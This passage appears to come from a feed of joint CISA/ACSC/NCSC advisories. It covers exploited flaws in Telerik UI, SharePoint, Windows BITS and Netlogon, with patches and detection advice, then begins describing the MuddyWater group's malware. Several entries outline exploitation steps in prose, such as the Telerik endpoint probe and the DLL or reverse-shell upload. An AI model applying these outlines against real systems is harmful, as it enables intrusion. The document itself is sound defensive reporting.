malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.\n\n| \n\n**_CVS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable `HTTP POST` parameter `rauPostData` makes use of a vulnerable function/object `AsyncUploadHandler`. The object/function uses the `JavaScriptSerializer.Deserialize()` method, which not not properly sanitize the serialized data during the deserialization process. This issue is attacked by:\n\n 1. Determining the vulnerable function is available/registered: ` http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau`,\n 2. Determining if the version running is vulnerable by querying the UI, and\n 3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.\n\n_There were two malware campaigns associated with this vulnerability:_\n\n * _Netwalker Ransomware and_\n * _Blue Mockbird Monero Cryptocurrency-mining._\n| \n\n_**Fix**_\n\n[Patch Available](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n \n_**Recommended Mitigations**_\n\n * Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later). \n \n_**Detection Methods**_\n\n * ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.\n * Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>).\n * Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n**_Vulnerable Technologies and Versions_**\n\nTelerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected. \n \n**_References_**\n\n * [Telerik UI for ASP.NET AJAX security advisory \u2013 Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)\n * [NIST NVD Vulnerability Detail: CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n * [ACSC Advisory 2020-004: Remote Code Execution Vulnerability Being Actively Exploited in Vulnerable Versions of Telerik UI by Sophisticated Actors](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)\n * [Bishop Fox \u2013 CVE-2019-18935: Remote Code Execution via Insecure Deserialization in Telerik UI](<https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>) \n \n_Table 13: CVE-2019-0604 Vulnerability Details_\n\nMicrosoft SharePoint Remote Code Execution (CVE-2019-0604) \n--- \n \n_**Vulnerability Description**_\n\nA vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.\n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThis vulnerability was typically exploited to install webshell malware to vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:\n\n`C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\<version_number>\\Template\\Layouts`\n\nThe `xmlSerializer.Deserialize()` method does not adequately sanitize user input that is received from the PickerEnitity/ValidateEnity (`picker.aspx`) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaulated for relevant XML commands and stings. A user can attack .Net based XML parsers with XMLNS payloads using the <`system:string`> tag and embedding malicious operating system commands. \n\n_The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>) \n \n_**Recommended Mitigations**_\n\n * Upgrade on-premise installations of Microsoft Sharepoint to the latest available version (Microsoft SharePoint 2019) and patch level.\n * On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible. \n \n_**Detection Methods**_\n\n * The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.\n * Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. [ACSC Advisory 2019-125](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>) contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.\n * NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2. \n \n_**References**_\n\n * [Microsoft \u2013 SharePoint Remote Code Execution Vulnerability Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)\n * [NIST NVD Vulnerability Detail: CVE-2019-0604](<https://nvd.nist.gov/vuln/detail/cve-2019-0604>)\n * [ACSC Advisory 2019-125: Targeting of Microsoft SharePoint CVE-2019-0604](<https://www.cyber.gov.au/acsc/view-all-content/advisories/acsc-advisory-2019-125-targeting-microsoft-sharepoint-cve-2019-0604>)\n * [NSCS Alert: Microsoft SharePoint Remote Code Vulnerability](<https://www.ncsc.gov.uk/news/alert-microsoft-sharepoint-remote-code-vulnerability>) \n \n_Table 14: CVE-2020-0787 Vulnerability Details_\n\nWindows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787) \n--- \n \n_**Vulnerability Description**_\n\nThe Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.\n\nActors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit\u2019s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:\n\n`C:\\Users\\<username>\\AppData\\Local\\Temp\\workspace \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\mountpoint \nC:\\Users\\<username>\\AppData\\Local\\Temp\\workspace\\bait`\n\n_The exploit was used in Maze and Egregor ransomware campaigns._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory. \n \n_**Vulnerable Technologies and Versions**_\n\nWindows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.\n\nWindows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable. \n \n_**References**_\n\n * [Microsoft \u2013 Windows Background Intelligent Transfer Service Elevation of Privilege Security Advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0787>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0787](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>)\n * [Security Researcher \u2013 Proof of Concept Exploit Code](<https://itm4n.github.io/cve-2020-0787-windows-bits-eop/>) \n \n_Table 15: CVE-2020-1472 Vulnerability Details_\n\nMicrosoft Netlogon Elevation of Privilege (CVE-2020-1472) \n--- \n \n_**Vulnerability Description**_\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (VI) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer including a domain controller, and potentially obtain domain administrator privileges.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nTo exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.\n\nThe immediate effect of successful exploitation results in the ability to authentication to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.\n\nThreat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.\n\n_A nation-state APT group has been observed exploiting this vulnerability_.[[18](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)]\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) \n \n_**Recommended Mitigations**_\n\n * Apply the security updates as recommended in the Microsoft Netlogon security advisory. \n \n_**Detection Methods**_\n\n * The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.\n * Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the [ACSC 2020-016 Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>). \n \n_**Vulnerable Technologies and Versions**_\n\nAt the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809. \n \n_**References**_\n\n * [Microsoft \u2013 Netlogon Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>)\n * [NIST NVD Vulnerability Detail: CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/cve-2020-1472>)\n * [ACSC 2020-016 Netlogon Advisory](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Advisory 2020-016: \"Zerologon\" \u2013 Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472>)\n * [NCSC Alert: UK Organisations Should Patch Netlogon Vulnerability (Zerologon)](<https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability>) \n \nFor additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) and ACSC\u2019s [Essential Eight](<https://www.cyber.gov.au/acsc/view-all-content/essential-eight>) mitigation strategies.\n\n### Additional Resources\n\n#### Free Cybersecurity Services\n\nCISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about [CISA\u2019s free services](<https://www.cisa.gov/cyber-hygiene-services>), or to sign up, email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n#### Cyber Essentials\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n#### Cyber.gov.au \n\n[ACSC\u2019s website](<https://www.cyber.gov.au/>) provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.\n\n#### ACSC Partnership Program\n\nThe ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.\n\nAustralian organizations, including government and those in the private sector as well individuals, are welcome to sign up at [Become an ACSC partner](<https://www.cyber.gov.au/partner-hub/become-a-partner>) to join.\n\n#### NCSC 10 Steps\n\nThe NCSC offers [10 Steps to Cyber Security](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/collection/10-steps__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWWI8Rbcz%24>), providing detailed guidance on how medium and large organizations can manage their security.\n\nOn vulnerabilities specifically, the NCSC has [guidance to organizations on establishing an effective vulnerability management process](<https://urldefense.us/v3/__https:/www.ncsc.gov.uk/guidance/vulnerability-management__;!!BClRuOV5cvtbuNI!T8Z-cMwGes9PcbBL1utGkQdFFUBjxNk7elZg1ioCK-eU1tUQokVWKONDFlwSGb1kHLNs74-CWfrZnnW4%24>), focusing on the management of widely available software and hardware.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### References\n\n[[1] NSA-CISA-FBI Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n\n[[2] CISA-FBI-NSA-NCSC Advisory: Further TTPs Associated with SVR Cyber Actors](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>)\n\n[[3] NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n[[4] ACSC Advisory 2020-001-4: Remediation for Critical Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2020-001-4-remediation-critical-vulnerability-citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[5] NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[6] Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n\n[[7] CISA-FBI Joint Cybersecurity Advisory: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[8] ACSC Alert: APT Exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\n[[9] NCSC Alert: Alert: Critical Risk to Unpatched Fortinet VPN Devices](<https://www.ncsc.gov.uk/news/critical-risk-unpatched-fortinet-vpn-devices>)\n\n[[10] NSA Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>)\n\n[[11] NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[12] NCSC-Canada\u2019s Communications Security Establishment-NSA-CISA Advisory: APT29 Targets COVID-19 Vaccine Development (CSE)](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n[[13] ACSC Advisory: Summary of Tactics, Techniques and Procedures Used to Target Australian Networks](<https://www.cyber.gov.au/acsc/view-all-content/advisories/summary-tactics-techniques-and-procedures-used-target-australian-networks>)\n\n[[14] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n\n[[15] CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[16] CISA Emergency Directive (ED 20-03): Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)\n\n[[17] NCSC Alert: Alert: Multiple Actors are Attempting to Exploit MobileIron Vulnerability CVE 2020-15505](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>)\n\n[[18] NJCCIC Alert: APT10 Adds ZeroLogon Exploitation to TTPs](<https://www.cyber.nj.gov/alerts-advisories/apt10-adds-zerologon-exploitation-to-ttps>)\n\n### Revisions\n\nInitial Version: July 28, 2021|August 4, 2021: Fixed typo|August 20, 2021: Adjusted vendor name for CVE-2020-1472\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-209A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T20:08:23", "description": "### Summary\n\n**Actions to Take Today to Protect Against Malicious Activity** \n* Search for indicators of compromise. \n* Use antivirus software. \n* [Patch](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) all systems. \n* Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n* Train users to recognize and report [phishing attempts](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n* Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n\n_**Note: **this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom\u2019s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors\u2014including telecommunications, defense, local government, and oil and natural gas\u2014in Asia, Africa, Europe, and North America. **Note:** MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.\n\nMuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[[1](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.\n\nMuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims\u2019 systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)\u2014to trick legitimate programs into running malware\u2014and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware\u2014variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS\u2014along with other tools as part of their malicious activity. \n\nThis advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. \n\nFBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. **Note:** also see the Additional Resources section.\n\n * Malware Analysis Report \u2013 [MAR-10369127-1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>)\n * IOCs \u2013 AA22-052A.stix and MAR-10369127-1.v1.stix\n * CISA's webpage \u2013 [Iran Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/iran>)\n * [NCSC-UK MAR \u2013 Small Sieve](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>)\n * [CNMF's press release \u2013 Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nFBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. \n\nAs part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor\u2019s C2 server or a PDF file that drops a malicious file to the victim\u2019s network [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001/>), [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>)]. MuddyWater actors also use techniques such as side-loading DLLs [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)] to trick legitimate programs into running malware and obfuscating PowerShell scripts [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)] to hide C2 functions [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)] (see the PowGoop section for more information). \n\nAdditionally, the group uses multiple malware sets\u2014including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS\u2014for loading malware, backdoor access, persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)], and exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]. See below for descriptions of some of these malware sets, including newer tools or variants to the group\u2019s suite. Additionally, see Malware Analysis Report [MAR-10369127.r1.v1: MuddyWater](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) for further details.\n\n#### **PowGoop**\n\nMuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.\n\nAccording to samples of PowGoop analyzed by [CISA](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-055a>) and [CNMF](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), PowGoop consists of three components:\n\n * A DLL file renamed as a legitimate filename, `Goopdate.dll`, to enable the DLL side-loading technique [[T1574.002](<https://attack.mitre.org/versions/v10/techniques/T1574/002/>)]. The DLL file is contained within an executable, `GoogleUpdate.exe`. \n * A PowerShell script, obfuscated as a .dat file, `goopdate.dat`, used to decrypt and run a second obfuscated PowerShell script, `config.txt` [[T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>)].\n * `config.txt`, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.\n\nThese components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. \n\n#### **Small Sieve**\n\nAccording to a sample [analyzed by NCSC-UK](<https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf>), Small Sieve is a simple Python [[T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006/>)] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, `gram_app.exe`. The NSIS installs the Python backdoor, `index.exe`, and adds it as a registry run key [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)], enabling persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]. \n\nMuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., \"Microsift\") and Outlook in its filenames associated with Small Sieve [[T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005/>)].\n\nSmall Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005/>)] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve\u2019s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [[T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001>)], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)], [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>)].\n\n**Note:** cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. \n\nSee Appendix B for further analysis of Small Sieve malware.\n\n#### **Canopy**\n\nMuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [[T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>)]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. **Note:** the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. \n\nIn the samples CISA analyzed, a malicious Excel file, `Cooperation terms.xls`, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [[T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002/>)]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.\n\nThe first .wsf is installed in the current user startup folder [[T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>)] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027/>)]. The file executes a command to run the second .wsf.\n\nThe second .wsf also contains hex-encoded 